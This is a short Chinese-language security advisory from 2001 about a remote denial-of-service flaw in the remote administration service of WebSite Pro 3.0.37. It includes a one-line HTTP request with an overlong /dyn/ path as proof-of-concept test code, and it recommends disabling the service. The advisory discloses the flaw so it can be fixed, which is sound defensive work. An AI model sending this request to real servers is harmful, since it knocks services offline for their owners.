xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Website Pro 远程管理软件存在拒绝服务攻击


发布时间:2001-03-31
更新时间:2001-03-31
严重程度:
威胁程度:远程拒绝服务
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Website Pro version 3.0.37
详细描述
WebSite Professional (http://website.oreilly.com/存在一个安全漏洞
可以导致远程攻击者执行一个拒绝服务攻击。Website Pro的远程管理服务
(默认端口是9999)对重超长的请求/dyn/目录会导致内存耗竭并导致服务器
程序停止服务。

测试代码
GET /dyn/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.0
Host: 10.0.0.1

解决方案
关闭远程管理服务。

相关信息